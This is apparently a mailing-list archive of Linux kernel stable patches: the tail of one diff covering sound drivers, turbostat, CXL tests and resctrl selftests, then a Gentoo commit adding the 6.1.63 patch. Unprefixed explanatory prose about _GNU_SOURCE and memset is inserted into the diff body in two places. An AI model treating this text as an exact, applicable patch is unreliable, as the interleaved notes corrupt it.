+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS,
+-		{0x17, 0x21014040},
+-		{0x18, 0x21a19050}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS),
+ 	SND_HDA_PIN_QUIRK(0x10ec0298, 0x1028, "Dell", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 		ALC298_STANDARD_PINS,
+ 		{0x17, 0x90170110}),
+@@ -10649,6 +10640,9 @@ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
+ 	SND_HDA_PIN_QUIRK(0x10ec0289, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1b, 0x40000000}),
++	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
++		{0x19, 0x40000000},
++		{0x1b, 0x40000000}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1a, 0x40000000}),
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 8ed48c86ccb33..2ccc68513f7c1 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -1682,6 +1682,9 @@ static int wsa_macro_spk_boost_event(struct snd_soc_dapm_widget *w,
+ 		boost_path_cfg1 = CDC_WSA_RX1_RX_PATH_CFG1;
+ 		reg = CDC_WSA_RX1_RX_PATH_CTL;
+ 		reg_mix = CDC_WSA_RX1_RX_PATH_MIX_CTL;
++	} else {
++		dev_warn(component->dev, "Incorrect widget name in the driver\n");
++		return -EINVAL;
+ 	}
+ 
+ 	switch (event) {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index cdcbf04b8832f..5e2ec60e2954b 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -75,6 +75,39 @@ static struct snd_soc_acpi_mach *cht_ess8316_quirk(void *arg)
+ 	return arg;
+ }
+ 
++/*
++ * The Lenovo Yoga Tab 3 Pro YT3-X90, with Android factory OS, has a buggy
++ * DSDT with the codec not being listed at all.
++ */
++static const struct dmi_system_id lenovo_yoga_tab3_x90[] = {
++	{
++		/* Lenovo Yoga Tab 3 Pro YT3-X90, codec missing from DSDT */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++	},
++	{ }
++};
++
++static struct snd_soc_acpi_mach cht_lenovo_yoga_tab3_x90_mach = {
++	.id = "10WM5102",
++	.drv_name = "bytcr_wm5102",
++	.fw_filename = "intel/fw_sst_22a8.bin",
++	.board = "bytcr_wm5102",
++	.sof_tplg_filename = "sof-cht-wm5102.tplg",
++};
++
++static struct snd_soc_acpi_mach *lenovo_yt3_x90_quirk(void *arg)
++{
++	if (dmi_check_system(lenovo_yoga_tab3_x90))
++		return &cht_lenovo_yoga_tab3_x90_mach;
++
++	/* Skip wildcard match snd_soc_acpi_intel_cherrytrail_machines[] entry */
++	return NULL;
++}
++
+ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ 	.num_codecs = 2,
+ 	.codecs = { "10EC5640", "10EC3276" },
+@@ -175,6 +208,16 @@ struct snd_soc_acpi_mach  snd_soc_acpi_intel_cherrytrail_machines[] = {
+ 		.drv_name = "sof_pcm512x",
+ 		.sof_tplg_filename = "sof-cht-src-50khz-pcm512x.tplg",
+ 	},
++	/*
++	 * Special case for the Lenovo Yoga Tab 3 Pro YT3-X90, where the codec
++	 * is missing from the DSDT. Match on the SST id instead;
++	 * lenovo_yt3_x90_quirk() will return a YT3-specific mach, or NULL when
++	 * called on other hw, skipping this entry.
++	 */
++	{
++		.id = "808622A8",
++		.machine_quirk = lenovo_yt3_x90_quirk,
++	},
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_INTEL_BYT_CHT_NOCODEC_MACH)
+ 	/*
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index c08f3960ddd96..06e1872abfee7 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -601,6 +601,9 @@ static void sof_ipc4_rx_msg(struct snd_sof_dev *sdev)
+ 	case SOF_IPC4_NOTIFY_LOG_BUFFER_STATUS:
+ 		sof_ipc4_mtrace_update_pos(sdev, SOF_IPC4_LOG_CORE_GET(ipc4_msg->primary));
+ 		break;
++	case SOF_IPC4_NOTIFY_EXCEPTION_CAUGHT:
++		snd_sof_dsp_panic(sdev, 0, true);
++		break;
+ 	default:
+ 		dev_dbg(sdev->dev, "Unhandled DSP message: %#x|%#x\n",
+ 			ipc4_msg->primary, ipc4_msg->extension);
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index cf2c0db57d899..061ab7289a6c3 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -832,6 +832,13 @@ int sof_machine_check(struct snd_sof_dev *sdev)
+ 		mach = snd_sof_machine_select(sdev);
+ 		if (mach) {
+ 			sof_pdata->machine = mach;
++
++			if (sof_pdata->subsystem_id_set) {
++				mach->mach_params.subsystem_vendor = sof_pdata->subsystem_vendor;
++				mach->mach_params.subsystem_device = sof_pdata->subsystem_device;
++				mach->mach_params.subsystem_id_set = true;
++			}
++
+ 			snd_sof_set_mach_params(mach, sdev);
+ 			return 0;
+ 		}
+diff --git a/sound/soc/sof/sof-pci-dev.c b/sound/soc/sof/sof-pci-dev.c
+index 05fb4e20e8a40..99cc272e321d0 100644
+--- a/sound/soc/sof/sof-pci-dev.c
++++ b/sound/soc/sof/sof-pci-dev.c
+@@ -217,6 +217,14 @@ int sof_pci_probe(struct pci_dev *pci, const struct pci_device_id *pci_id)
+ 		return ret;
+ 
+ 	sof_pdata->name = pci_name(pci);
++
++	/* PCI defines a vendor ID of 0xFFFF as invalid. */
++	if (pci->subsystem_vendor != 0xFFFF) {
++		sof_pdata->subsystem_vendor = pci->subsystem_vendor;
++		sof_pdata->subsystem_device = pci->subsystem_device;
++		sof_pdata->subsystem_id_set = true;
++	}
++
+ 	sof_pdata->desc = desc;
+ 	sof_pdata->dev = dev;
+ 
+diff --git a/sound/soc/ti/omap-mcbsp.c b/sound/soc/ti/omap-mcbsp.c
+index 7c539a41a6a34..4b8aac1a36fa2 100644
+--- a/sound/soc/ti/omap-mcbsp.c
++++ b/sound/soc/ti/omap-mcbsp.c
+@@ -74,14 +74,16 @@ static int omap2_mcbsp_set_clks_src(struct omap_mcbsp *mcbsp, u8 fck_src_id)
+ 		return -EINVAL;
+ 	}
+ 
+-	pm_runtime_put_sync(mcbsp->dev);
++	if (mcbsp->active)
++		pm_runtime_put_sync(mcbsp->dev);
+ 
+ 	r = clk_set_parent(mcbsp->fclk, fck_src);
+ 	if (r)
+ 		dev_err(mcbsp->dev, "CLKS: could not clk_set_parent() to %s\n",
+ 			src);
+ 
+-	pm_runtime_get_sync(mcbsp->dev);
++	if (mcbsp->active)
++		pm_runtime_get_sync(mcbsp->dev);
+ 
+ 	clk_put(fck_src);
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index d1338a4071268..6fb64c58b408b 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -1483,9 +1483,11 @@ static void intel_pt_sample_flags(struct intel_pt_queue *ptq)
+ 	} else if (ptq->state->flags & INTEL_PT_ASYNC) {
+ 		if (!ptq->state->to_ip)
+ 			ptq->flags = PERF_IP_FLAG_BRANCH |
++				     PERF_IP_FLAG_ASYNC |
+ 				     PERF_IP_FLAG_TRACE_END;
+ 		else if (ptq->state->from_nr && !ptq->state->to_nr)
+ 			ptq->flags = PERF_IP_FLAG_BRANCH | PERF_IP_FLAG_CALL |
++				     PERF_IP_FLAG_ASYNC |
+ 				     PERF_IP_FLAG_VMEXIT;
+ 		else
+ 			ptq->flags = PERF_IP_FLAG_BRANCH | PERF_IP_FLAG_CALL |
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index c61c6c704fbe6..b113900d94879 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -2180,7 +2180,7 @@ retry:
+ 	if ((DO_BIC(BIC_CPU_c6) || soft_c1_residency_display(BIC_CPU_c6)) && !do_knl_cstates) {
+ 		if (get_msr(cpu, MSR_CORE_C6_RESIDENCY, &c->c6))
+ 			return -7;
+-	} else if (do_knl_cstates || soft_c1_residency_display(BIC_CPU_c6)) {
++	} else if (do_knl_cstates && soft_c1_residency_display(BIC_CPU_c6)) {
+ 		if (get_msr(cpu, MSR_KNL_CORE_C6_RESIDENCY, &c->c6))
+ 			return -7;
+ 	}
+@@ -5790,6 +5790,7 @@ void process_cpuid()
+ 	rapl_probe(family, model);
+ 	perf_limit_reasons_probe(family, model);
+ 	automatic_cstate_conversion_probe(family, model);
++	prewake_cstate_probe(family, model);
+ 
+ 	check_tcc_offset(model_orig);
+ 
+diff --git a/tools/testing/cxl/test/cxl.c b/tools/testing/cxl/test/cxl.c
+index 7edce12fd2ce5..339b31a3319bf 100644
+--- a/tools/testing/cxl/test/cxl.c
++++ b/tools/testing/cxl/test/cxl.c
+@@ -551,6 +551,142 @@ static int mock_decoder_reset(struct cxl_decoder *cxld)
+ 	return 0;
+ }
+ 
++static void default_mock_decoder(struct cxl_decoder *cxld)
++{
++	cxld->hpa_range = (struct range){
++		.start = 0,
++		.end = -1,
++	};
++
++	cxld->interleave_ways = 1;
++	cxld->interleave_granularity = 256;
++	cxld->target_type = CXL_DECODER_EXPANDER;
++	cxld->commit = mock_decoder_commit;
++	cxld->reset = mock_decoder_reset;
++}
++
++static int first_decoder(struct device *dev, void *data)
++{
++	struct cxl_decoder *cxld;
++
++	if (!is_switch_decoder(dev))
++		return 0;
++	cxld = to_cxl_decoder(dev);
++	if (cxld->id == 0)
++		return 1;
++	return 0;
++}
++
++static void mock_init_hdm_decoder(struct cxl_decoder *cxld)
++{
++	struct acpi_cedt_cfmws *window = mock_cfmws[0];
++	struct platform_device *pdev = NULL;
++	struct cxl_endpoint_decoder *cxled;
++	struct cxl_switch_decoder *cxlsd;
++	struct cxl_port *port, *iter;
++	const int size = SZ_512M;
++	struct cxl_memdev *cxlmd;
++	struct cxl_dport *dport;
++	struct device *dev;
++	bool hb0 = false;
++	u64 base;
++	int i;
++
++	if (is_endpoint_decoder(&cxld->dev)) {
++		cxled = to_cxl_endpoint_decoder(&cxld->dev);
++		cxlmd = cxled_to_memdev(cxled);
++		WARN_ON(!dev_is_platform(cxlmd->dev.parent));
++		pdev = to_platform_device(cxlmd->dev.parent);
++
++		/* check if the endpoint is attached to host-bridge0 */
++		port = cxled_to_port(cxled);
++		do {
++			if (port->uport == &cxl_host_bridge[0]->dev) {
++				hb0 = true;
++				break;
++			}
++			if (is_cxl_port(port->dev.parent))
++				port = to_cxl_port(port->dev.parent);
++			else
++				port = NULL;
++		} while (port);
++		port = cxled_to_port(cxled);
++	}
++
++	/*
++	 * The first decoder on the first 2 devices on the first switch
++	 * The first decoder on each of the first 2 devices on the first switch
++	 * attached to host-bridge0 mocks a fake / static RAM region. All
++	 * assignment those devices are named cxl_mem.0, and cxl_mem.4.
++	 *
++	 * See 'cxl list -BMPu -m cxl_mem.0,cxl_mem.4'
++	 */
++	if (!hb0 || pdev->id % 4 || pdev->id > 4 || cxld->id > 0) {
++		default_mock_decoder(cxld);
++		return;
++	}
++
++	base = window->base_hpa;
++	cxld->hpa_range = (struct range) {
++		.start = base,
++		.end = base + size - 1,
++	};
++
++	cxld->interleave_ways = 2;
++	eig_to_granularity(window->granularity, &cxld->interleave_granularity);
++	cxld->target_type = CXL_DECODER_EXPANDER;
++	cxld->flags = CXL_DECODER_F_ENABLE;
++	cxled->state = CXL_DECODER_STATE_AUTO;
++	port->commit_end = cxld->id;
++	devm_cxl_dpa_reserve(cxled, 0, size / cxld->interleave_ways, 0);
++	cxld->commit = mock_decoder_commit;
++	cxld->reset = mock_decoder_reset;
++
++	/*
++	 * Now that endpoint decoder is set up, walk up the hierarchy
++	 * and setup the switch and root port decoders targeting @cxlmd.
++	 */
++	iter = port;
++	for (i = 0; i < 2; i++) {
++		dport = iter->parent_dport;
++		iter = dport->port;
++		dev = device_find_child(&iter->dev, NULL, first_decoder);
++		/*
++		 * Ancestor ports are guaranteed to be enumerated before
++		 * @port, and all ports have at least one decoder.
++		 */
++		if (WARN_ON(!dev))
++			continue;
++		cxlsd = to_cxl_switch_decoder(dev);
++		if (i == 0) {
++			/* put cxl_mem.4 second in the decode order */
++			if (pdev->id == 4)
++				cxlsd->target[1] = dport;
++			else
++				cxlsd->target[0] = dport;
++		} else
++			cxlsd->target[0] = dport;
++		cxld = &cxlsd->cxld;
++		cxld->target_type = CXL_DECODER_EXPANDER;
++		cxld->flags = CXL_DECODER_F_ENABLE;
++		iter->commit_end = 0;
++		/*
++		 * Switch targets 2 endpoints, while host bridge targets
++		 * one root port
++		 */
++		if (i == 0)
++			cxld->interleave_ways = 2;
++		else
++			cxld->interleave_ways = 1;
++		cxld->interleave_granularity = 4096;
++		cxld->hpa_range = (struct range) {
++			.start = base,
++			.end = base + size - 1,
++		};
++		put_device(dev);
++	}
++}
++
+ static int mock_cxl_enumerate_decoders(struct cxl_hdm *cxlhdm)
+ {
+ 	struct cxl_port *port = cxlhdm->port;
+@@ -596,16 +732,7 @@ static int mock_cxl_enumerate_decoders(struct cxl_hdm *cxlhdm)
+ 			cxld = &cxled->cxld;
+ 		}
+ 
+-		cxld->hpa_range = (struct range) {
+-			.start = 0,
+-			.end = -1,
+-		};
+-
+-		cxld->interleave_ways = min_not_zero(target_count, 1);
+-		cxld->interleave_granularity = SZ_4K;
+-		cxld->target_type = CXL_DECODER_EXPANDER;
+-		cxld->commit = mock_decoder_commit;
+-		cxld->reset = mock_decoder_reset;
++		mock_init_hdm_decoder(cxld);
+ 
+ 		if (target_count) {
+ 			rc = device_for_each_child(port->uport, &ctx,
+diff --git a/tools/testing/selftests/efivarfs/create-read.c b/tools/testing/selftests/efivarfs/create-read.c
+index 9674a19396a32..7bc7af4eb2c17 100644
+--- a/tools/testing/selftests/efivarfs/create-read.c
++++ b/tools/testing/selftests/efivarfs/create-read.c
+@@ -32,8 +32,10 @@ int main(int argc, char **argv)
+ 	rc = read(fd, buf, sizeof(buf));
+ 	if (rc != 0) {
+ 		fprintf(stderr, "Reading a new var should return EOF\n");
++		close(fd);
+ 		return EXIT_FAILURE;
+ 	}
+ 
++	close(fd);
+ 	return EXIT_SUCCESS;
+ }
+diff --git a/tools/testing/selftests/lkdtm/config b/tools/testing/selftests/lkdtm/config
+index 5d52f64dfb430..7afe05e8c4d79 100644
+--- a/tools/testing/selftests/lkdtm/config
++++ b/tools/testing/selftests/lkdtm/config
+@@ -9,7 +9,6 @@ CONFIG_INIT_ON_FREE_DEFAULT_ON=y
+ CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y
+ CONFIG_UBSAN=y
+ CONFIG_UBSAN_BOUNDS=y
+-CONFIG_UBSAN_TRAP=y
+ CONFIG_STACKPROTECTOR_STRONG=y
+ CONFIG_SLUB_DEBUG=y
+ CONFIG_SLUB_DEBUG_ON=y
+diff --git a/tools/testing/selftests/lkdtm/tests.txt b/tools/testing/selftests/lkdtm/tests.txt
+index 607b8d7e3ea34..2f3a1b96da6e3 100644
+--- a/tools/testing/selftests/lkdtm/tests.txt
++++ b/tools/testing/selftests/lkdtm/tests.txt
+@@ -7,7 +7,7 @@ EXCEPTION
+ #EXHAUST_STACK Corrupts memory on failure
+ #CORRUPT_STACK Crashes entire system on success
+ #CORRUPT_STACK_STRONG Crashes entire system on success
+-ARRAY_BOUNDS
++ARRAY_BOUNDS call trace:|UBSAN: array-index-out-of-bounds
+ CORRUPT_LIST_ADD list_add corruption
+ CORRUPT_LIST_DEL list_del corruption
+ STACK_GUARD_PAGE_LEADING
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 5073dbc961258..2deac2031de9e 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS = -g -Wall -O2 -D_FORTIFY_SOURCE=2
++CFLAGS = -g -Wall -O2 -D_FORTIFY_SOURCE=2 -D_GNU_SOURCE
+ CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := resctrl_tests
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 3b0454e7fc826..dd9f9db70af46 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -91,9 +91,6 @@ int cmt_resctrl_val(int cpu_no, int n, char **benchmark_cmd)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!validate_resctrl_feature_request(CMT_STR))
+-		return -1;
+-
+ 	ret = get_cbm_mask("L3", cbm_mask);
+ 	if (ret)
+ 		return ret;
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 97dc98c0c9497..ff8b588b63ed7 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -12,7 +12,7 @@
+ 
+ #define RESULT_FILE_NAME	"result_mba"
+ #define NUM_OF_RUNS		5
+-#define MAX_DIFF_PERCENT	5
++#define MAX_DIFF_PERCENT	8
+ #define ALLOCATION_MAX		100
+ #define ALLOCATION_MIN		10
+ #define ALLOCATION_STEP		10
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 280187628054d..5dc1dce89733a 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -11,7 +11,7 @@
+ #include "resctrl.h"
+ 
+ #define RESULT_FILE_NAME	"result_mbm"
+-#define MAX_DIFF_PERCENT	5
++#define MAX_DIFF_PERCENT	8
+ #define NUM_OF_RUNS		5
+ 
+ static int
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index dbe5cfb545585..4597bba66ad45 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -1,5 +1,4 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-#define _GNU_SOURCE
+ #ifndef RESCTRL_H
+ #define RESCTRL_H
+ #include <stdio.h>
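The resctrl Makefile hunk earlier (adding -D_GNU_SOURCE to CFLAGS) and this
resctrl.h hunk belong together: _GNU_SOURCE only takes effect if it is
defined before the first libc header is processed, so defining it inside one
header is fragile. A small illustration of the ordering hazard (assumed
example, not from the patch):

	#include <string.h>	/* glibc's features.h is evaluated here */
	#define _GNU_SOURCE	/* too late: feature macros are already fixed */
	#include <sched.h>	/* GNU extensions such as CPU_SET stay hidden */

Passing the define on the compiler command line guarantees it precedes every
include.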


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-20 11:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-20 11:23 UTC (permalink / raw
  To: gentoo-commits

commit:     34b054e030b4d77909f23813b69a0cb891c5e2fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Nov 20 11:22:41 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Nov 20 11:22:41 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=34b054e0

Linux patch 6.1.63

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1062_linux-6.1.63.patch | 22957 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 22961 insertions(+)

diff --git a/0000_README b/0000_README
index 3a96d6b9..56731b47 100644
--- a/0000_README
+++ b/0000_README
@@ -291,6 +291,10 @@ Patch:  1061_linux-6.1.62.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.62
 
+Patch:  1062_linux-6.1.63.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.63
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1062_linux-6.1.63.patch b/1062_linux-6.1.63.patch
new file mode 100644
index 00000000..00337f2f
--- /dev/null
+++ b/1062_linux-6.1.63.patch
@@ -0,0 +1,22957 @@
+diff --git a/Documentation/devicetree/bindings/mfd/mt6397.txt b/Documentation/devicetree/bindings/mfd/mt6397.txt
+index 0088442efca1a..8f9784af92d6e 100644
+--- a/Documentation/devicetree/bindings/mfd/mt6397.txt
++++ b/Documentation/devicetree/bindings/mfd/mt6397.txt
+@@ -21,8 +21,10 @@ Required properties:
+ compatible:
+ 	"mediatek,mt6323" for PMIC MT6323
+ 	"mediatek,mt6331" for PMIC MT6331 and MT6332
+-	"mediatek,mt6358" for PMIC MT6358 and MT6366
++	"mediatek,mt6357" for PMIC MT6357
++	"mediatek,mt6358" for PMIC MT6358
+ 	"mediatek,mt6359" for PMIC MT6359
++	"mediatek,mt6366", "mediatek,mt6358" for PMIC MT6366
+ 	"mediatek,mt6397" for PMIC MT6397
+ 
+ Optional subnodes:
+@@ -39,6 +41,7 @@ Optional subnodes:
+ 		- compatible: "mediatek,mt6323-regulator"
+ 	see ../regulator/mt6323-regulator.txt
+ 		- compatible: "mediatek,mt6358-regulator"
++		- compatible: "mediatek,mt6366-regulator", "mediatek,mt6358-regulator"
+ 	see ../regulator/mt6358-regulator.txt
+ 		- compatible: "mediatek,mt6397-regulator"
+ 	see ../regulator/mt6397-regulator.txt
+diff --git a/Documentation/virt/coco/sev-guest.rst b/Documentation/virt/coco/sev-guest.rst
+index bf593e88cfd9d..68b0d2363af82 100644
+--- a/Documentation/virt/coco/sev-guest.rst
++++ b/Documentation/virt/coco/sev-guest.rst
+@@ -37,11 +37,11 @@ along with a description:
+       the return value.  General error numbers (-ENOMEM, -EINVAL)
+       are not detailed, but errors with specific meanings are.
+ 
+-The guest ioctl should be issued on a file descriptor of the /dev/sev-guest device.
+-The ioctl accepts struct snp_user_guest_request. The input and output structure is
+-specified through the req_data and resp_data field respectively. If the ioctl fails
+-to execute due to a firmware error, then fw_err code will be set otherwise the
+-fw_err will be set to 0x00000000000000ff.
++The guest ioctl should be issued on a file descriptor of the /dev/sev-guest
++device.  The ioctl accepts struct snp_user_guest_request. The input and
++output structures are specified through the req_data and resp_data fields
++respectively. If the ioctl fails to execute due to a firmware error, then
++the fw_error code will be set, otherwise fw_error will be set to -1.
+ 
+ The firmware checks that the message sequence counter is one greater than
+ the guests message sequence counter. If guest driver fails to increment message
+@@ -57,8 +57,14 @@ counter (e.g. counter overflow), then -EIO will be returned.
+                 __u64 req_data;
+                 __u64 resp_data;
+ 
+-                /* firmware error code on failure (see psp-sev.h) */
+-                __u64 fw_err;
++                /* bits[63:32]: VMM error code, bits[31:0] firmware error code (see psp-sev.h) */
++                union {
++                        __u64 exitinfo2;
++                        struct {
++                                __u32 fw_error;
++                                __u32 vmm_error;
++                        };
++                };
+         };
+ 
+ 2.1 SNP_GET_REPORT
+diff --git a/Makefile b/Makefile
+index 2e7bc3cc1c177..7c69293b7e059 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 62
++SUBLEVEL = 63
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am3517-evm.dts b/arch/arm/boot/dts/am3517-evm.dts
+index 7bab0a9dadb30..95508b7fa3bf6 100644
+--- a/arch/arm/boot/dts/am3517-evm.dts
++++ b/arch/arm/boot/dts/am3517-evm.dts
+@@ -271,13 +271,6 @@
+ 		>;
+ 	};
+ 
+-	leds_pins: pinmux_leds_pins {
+-		pinctrl-single,pins = <
+-			OMAP3_WKUP_IOPAD(0x2a24, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu0.gpio_11 */
+-			OMAP3_WKUP_IOPAD(0x2a26, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu1.gpio_31 */
+-		>;
+-	};
+-
+ 	mmc1_pins: pinmux_mmc1_pins {
+ 		pinctrl-single,pins = <
+ 			OMAP3_CORE1_IOPAD(0x2144, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk.sdmmc1_clk */
+@@ -355,3 +348,12 @@
+ 		>;
+ 	};
+ };
++
++&omap3_pmx_wkup {
++	leds_pins: pinmux_leds_pins {
++		pinctrl-single,pins = <
++			OMAP3_WKUP_IOPAD(0x2a24, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu0.gpio_11 */
++			OMAP3_WKUP_IOPAD(0x2a26, PIN_OUTPUT_PULLUP | MUX_MODE4)	/* jtag_emu1.gpio_31 */
++		>;
++	};
++};
+diff --git a/arch/arm/boot/dts/qcom-mdm9615.dtsi b/arch/arm/boot/dts/qcom-mdm9615.dtsi
+index b47c86412de2c..17a1a06dfb3f1 100644
+--- a/arch/arm/boot/dts/qcom-mdm9615.dtsi
++++ b/arch/arm/boot/dts/qcom-mdm9615.dtsi
+@@ -82,14 +82,12 @@
+ 		};
+ 	};
+ 
+-	regulators {
+-		vsdcc_fixed: vsdcc-regulator {
+-			compatible = "regulator-fixed";
+-			regulator-name = "SDCC Power";
+-			regulator-min-microvolt = <2700000>;
+-			regulator-max-microvolt = <2700000>;
+-			regulator-always-on;
+-		};
++	vsdcc_fixed: vsdcc-regulator {
++		compatible = "regulator-fixed";
++		regulator-name = "SDCC Power";
++		regulator-min-microvolt = <2700000>;
++		regulator-max-microvolt = <2700000>;
++		regulator-always-on;
+ 	};
+ 
+ 	soc: soc {
+diff --git a/arch/arm/boot/dts/r8a7792-blanche.dts b/arch/arm/boot/dts/r8a7792-blanche.dts
+index c66de9dd12dfc..6a83923aa4612 100644
+--- a/arch/arm/boot/dts/r8a7792-blanche.dts
++++ b/arch/arm/boot/dts/r8a7792-blanche.dts
+@@ -239,7 +239,7 @@
+ 	};
+ 
+ 	keyboard_pins: keyboard {
+-		pins = "GP_3_10", "GP_3_11", "GP_3_12", "GP_3_15", "GP_11_02";
++		pins = "GP_3_10", "GP_3_11", "GP_3_12", "GP_3_15", "GP_11_2";
+ 		bias-pull-up;
+ 	};
+ 
+diff --git a/arch/arm/lib/memset.S b/arch/arm/lib/memset.S
+index d71ab61430b26..de75ae4d5ab41 100644
+--- a/arch/arm/lib/memset.S
++++ b/arch/arm/lib/memset.S
+@@ -17,6 +17,7 @@ ENTRY(__memset)
+ ENTRY(mmioset)
+ WEAK(memset)
+ UNWIND( .fnstart         )
++	and	r1, r1, #255		@ cast to unsigned char
+ 	ands	r3, r0, #3		@ 1 unaligned?
+ 	mov	ip, r0			@ preserve r0 as return value
+ 	bne	6f			@ 1
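The added `and r1, r1, #255` implements C's contract for memset: the int fill
value is converted to unsigned char before the object is filled (C11
7.24.6.1), so only the low byte may be stored. A worked example of the
behavior the fix restores:

	#include <string.h>

	/* inside any function: */
	char buf[4];
	memset(buf, 0x141, sizeof(buf));	/* value becomes
						   (unsigned char)0x141 == 0x41 */
	/* buf now holds "AAAA", identical to memset(buf, 'A', 4) */
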
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index 93c8ccbf29828..b647306eb1608 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -164,9 +164,6 @@ static int xen_starting_cpu(unsigned int cpu)
+ 	BUG_ON(err);
+ 	per_cpu(xen_vcpu, cpu) = vcpup;
+ 
+-	if (!xen_kernel_unmapped_at_usr())
+-		xen_setup_runstate_info(cpu);
+-
+ after_register_vcpu_info:
+ 	enable_percpu_irq(xen_events_irq, 0);
+ 	return 0;
+@@ -523,9 +520,6 @@ static int __init xen_guest_init(void)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!xen_kernel_unmapped_at_usr())
+-		xen_time_setup_guest();
+-
+ 	if (xen_initial_domain())
+ 		pvclock_gtod_register_notifier(&xen_pvclock_gtod_notifier);
+ 
+@@ -535,7 +529,13 @@ static int __init xen_guest_init(void)
+ }
+ early_initcall(xen_guest_init);
+ 
+-static int __init xen_pm_init(void)
++static int xen_starting_runstate_cpu(unsigned int cpu)
++{
++	xen_setup_runstate_info(cpu);
++	return 0;
++}
++
++static int __init xen_late_init(void)
+ {
+ 	if (!xen_domain())
+ 		return -ENODEV;
+@@ -548,9 +548,16 @@ static int __init xen_pm_init(void)
+ 		do_settimeofday64(&ts);
+ 	}
